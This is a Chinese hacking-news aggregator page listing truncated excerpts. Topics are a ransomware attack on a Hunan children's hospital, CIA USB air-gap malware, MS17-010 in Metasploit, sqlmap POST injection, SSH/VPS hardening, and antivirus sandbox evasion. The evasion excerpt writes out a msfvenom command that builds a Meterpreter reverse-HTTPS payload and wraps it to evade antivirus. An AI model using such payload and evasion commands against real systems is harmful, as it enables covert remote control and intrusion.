记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

勒索病毒入侵儿童医院,防御袭击需常态化!

节后流感高发,医院也开始变得人满为患,然而就在大家为流感忙得焦头烂额时,勒索病毒又来了。近日,国内两家省级医院服务器疑似遭最新勒索病毒攻击,致其系统瘫痪,同时数据库文件被加密破坏,已影响正常就医秩序。 据悉,其中一家湖南省儿童医院受到的影响最为严重,从2018年2月24日7点左右,全院所有的医疗系统均无法正常使用,经过查实,医院服务器中了疑似最新的勒索病毒,目前,黑客要求院方在6小时内为每台中招机器支付1个比特币,根据目前比特币最新的价格,1枚比特币约合人民币6.5万元左右。 勒索病毒有哪些危害? 勒索病毒的危害去年已经让我们充分见识了一次,勒索病毒感染后会对电脑和服务器中的重要文件、数据甚至整个硬盘进行加密锁定,文件、数据被加密后没法使用,造成整个电脑或服务器无法正常运行,从而使相关业务系统的无法正常运行,
发布时间:2018-03-01 18:10 | 阅读:148709 | 评论:0 | 标签:安全前沿 信息安全 内网安全 勒索病毒 终端安全

网闸也不安全 中情局用“野蛮袋鼠”就能渗透内网

近日,维基解密了一个美国中央情报局CIA关于“野蛮袋鼠” 黑客程序项目的档案。该150页文件详细描述了美国情报机构是如何远程渗透入侵隔离的计算机网络的。其中一个组件代号“激动猿猴”(Shattered Assurance)的工具,它可以快速感染插入电脑的U盘,当受感染的U盘插入物理隔离的内网电脑时,将恶意软件部署到这些电脑当中。这意味着大部分物理、逻辑隔离网络已经不再安全,即使用了网闸隔离的网络也已经不那么可靠。U盘成为“野蛮袋鼠”的得力帮凶“野蛮袋鼠”主要通过U盘在不同的网络之间交叉感染,具体过程为:1. 首先,通过感染与互联网连接的内部计算机,在其安装“激动猿猴”(Emotional Simian)恶意软件;2. 不知情的用户如将U盘插入被感染的计算机,该U盘即被“激动猿猴”快速感染;3. 当被感染的U盘插
发布时间:2017-08-07 22:15 | 阅读:89916 | 评论:0 | 标签:技术产品 内网安全 网闸 联软科技

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

0x01 引言 2017年4月,网络最为轰动的事件无疑是TheShadowBrokers放出一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。这对互联网无疑造成了一次大地震,因为已经很久没有出现过像MS17-010这种级别的漏洞了,因此就被大家笑语说出了“指哪打哪”这样一个事实。受影响的Windows 版本包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windo
发布时间:2017-05-04 16:40 | 阅读:1075331 | 评论:2 | 标签:技术 Eternalblue Metasploit 内网安全 漏洞

应用攻略:IP-guard子网检测管理,拒绝员工私设路由器!

利用路由器在公司中私设网络,是很多企业都很头痛的问题,既不方便管理又容易带来安全威胁。为严防这些现象,一些企业给每个员工的计算机分配固定IP地址,只允许该合法设备访问重要系统,然而员工仍能利用路由器的IP转换功能架设网络连接内网,让个人设备顺利访问公司的重要系统。 那么该如何及时发现并管理这些私设网络的行为呢?我们很多客户中也曾提到过相关的要求,现在IP-guard的子网检测管理功能就可以帮助客户及时发现违规客户端,防止非法客户端访问重要系统! IP-guard 子网检测管理 功能原理:IP-guard服务器如果检测到配置范围内的客户端连接IP-guard服务器的IP,不是客户端基本信息中获取的IP之一,则控制台会弹出报警信息并记录日志信息。 应用实例:某公司有一台重要的业务服务器A(192.168.8.129
发布时间:2016-10-21 22:15 | 阅读:122766 | 评论:0 | 标签:微信公众号 内网安全

Burp Suite Article

Burp Suite 1: Introduction http://kyrionhackingtutorials.com/2012/05/burp-suite-1-introduction-2/ Burp Suite 2: Proxy | Intruder http://kyrionhackingtutorials.com/2012/05/burp-suite-2-proxy-intruder/ Burp Suite 3: Remotely Interception http://kyrionhackingtutorials.com/2012/05/burp-suite-3-remotely-interception/ Burp Suite 4: Repeater http://k
发布时间:2013-01-07 21:24 | 阅读:116734 | 评论:0 | 标签:burpsuite Burp Suite DDoS攻击 代码审计 内网安全 反病毒 社会工程学 网络安全 网络技术 风险

Sqlmap POST型注入

这里举例的是一个登录点存在post型注入 常用的注入工具测试都木有成功 用火狐的Tamper Data插件修改提交 可以看到报错信息 确定注入是存在的 这里用sqlmap测试注入 首先抓包(如burpsuite)获取提交的参数信息保存为post-sql.txt -r 加载这个post request文件 -p 指定可测试的参数 相关: sqlmap使用笔记 http://blog.bug.cx/2012/06/15/sqlmap%e4%bd%bf%e7%94%a8%e7%ac%94%e8%ae%b0/   Related posts: Sqlmap plugin for BurpSuite 如何使用SQLMap绕过WAF sqlmap使用笔记 Related posts: Sqlmap plugin

Antivirus Sandbox Evasion-ultimate-payload.pl

http://funoverip.net/2012/02/antivirus-sandbox-evasion-part1/ $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe [*ultimate] Waiting for payload from STDIN [*ultimate] Payload: read (size: 367) [*ultimate] Payload: encode (new size: 1161) [*ul
发布时间:2013-01-07 21:24 | 阅读:116637 | 评论:0 | 标签:metasploit DDoS攻击 msfencode msfpayload 代码审计 内网安全 反病毒 社会工程学

msf the pentest userguide 读书笔记 v2.pdf

http://forum.90sec.org/thread-3381-1-1.html msf_the_pentest_userguide_读书笔记_v2.pdf下载:msf_the_pentest_userguide_读书笔记_v2 作者写得不错  可以多看看 Related posts: Antivirus Sandbox Evasion-ultimate-payload.pl 黑客攻防实验环境部署.pdf 安全防御体系的构建.pdf Related posts: Antivirus Sandbox Evasion-ultimate-payload.pl 黑客攻防实验环境部署.pdf 安全防御体系的构建.pdf

VPS常用安全设置

http://www.2cto.com/Article/201208/147987.html 新手及才接触VPS的朋友们看一下,主要是关于VPS安全方面相关内容的: 一、修改SSH端口 vi /etc/ssh/sshd_config 找到其中的#Port 22(第13行),去掉#,修改成Port 3333 使用如下命令,重启SSH服务,注:以后用新端口登陆。 service sshd restart 二、禁止ROOT登陆 先添加一个新帐号80st ,可以自定义: useradd 80st 给weidao 帐号设置密码: passwd 80st 仍旧是修改/etc/ssh/sshd_config文件,第39行:#PermitRootLogin yes,去掉前面的#,并把yes改成no,然后,重启SSH服务。以后,

高级SSH安全技巧.pdf

高级SSH安全技巧.pdf下载:高级SSH安全技巧 Related posts: msf the pentest userguide 读书笔记 v2.pdf Antivirus Sandbox Evasion-ultimate-payload.pl VPS常用安全设置 Related posts: msf the pentest userguide 读书笔记 v2.pdf Antivirus Sandbox Evasion-ultimate-payload.pl VPS常用安全设置

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云